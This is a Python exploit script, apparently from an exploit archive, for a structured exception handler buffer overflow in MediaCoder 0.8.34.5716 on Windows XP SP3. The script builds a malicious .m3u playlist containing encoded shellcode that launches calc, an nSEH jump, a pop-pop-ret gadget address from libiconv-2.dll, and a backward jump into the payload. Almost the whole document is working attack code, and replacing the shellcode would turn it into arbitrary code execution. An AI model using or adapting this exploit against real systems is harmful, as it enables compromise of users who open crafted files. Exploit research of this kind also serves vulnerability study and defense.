#!/usr/bin/python # Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u) # Date: 05/May/2015 # Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan # email: kwiha2003 [at ]yahoo [dot] com # Version: 0.8.34.5716 # Tested on: Win XP3 # Vendor: http://www.mediacoderhq.com/ # Software link: http://www.mediacoderhq.com/getfile.htm?site=mediacoder.info&file=MediaCoder-0.8.34.5716.exe # Greetz: b33f,corelan,offsec,vulnhub,HUST510 # Notes: Due to insifficient space after taking control of the EIP, you have to jump backwards and also # avoid a few bad bytes after the "A"s. #!/usr/bin/python buffersize = 853 buffer = ("http://" + "\x41" * 256) #Space for shellcode to decode buffer += "\x90" * 24 # msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x20" -t c -e x86/shikata_ga_nai #[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1) #unsigned char buf[] = buffer +=("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1" "\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69" "\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c" "\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69" "\xf1\x27\x70\x73\x26\x88\x49\xbc\x3b\xc9\x8e\xa0\xb4\x9b\x47" "\xaf\x67\x0c\xe3\xed\xbb\x2d\x23\x7a\x83\x55\x46\xbc\x70\xec" "\x49\xec\x29\x7b\x01\x14\x41\x23\xb2\x25\x86\x37\x8e\x6c\xa3" "\x8c\x64\x6f\x65\xdd\x85\x5e\x49\xb2\xbb\x6f\x44\xca\xfc\x57" "\xb7\xb9\xf6\xa4\x4a\xba\xcc\xd7\x90\x4f\xd1\x7f\x52\xf7\x31" "\x7e\xb7\x6e\xb1\x8c\x7c\xe4\x9d\x90\x83\x29\x96\xac\x08\xcc" "\x79\x25\x4a\xeb\x5d\x6e\x08\x92\xc4\xca\xff\xab\x17\xb2\xa0" "\x09\x53\x50\xb4\x28\x3e\x3e\x4b\xb8\x44\x07\x4b\xc2\x46\x27" "\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf" "\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb" "\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae") buffer += "\x42" * 350 nseh = "\xEB\x06\x90\x90" # 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll] seh="\xee\x04\x01\x66" #Jump back 603 bytes due to insufficient space for shellcode jmpbck = "\xe9\xA5\xfd\xff\xff" junk = ("D" * 55) f= open("exploit.m3u",'w') f.write(buffer + nseh + seh + jmpbck + junk) f.close()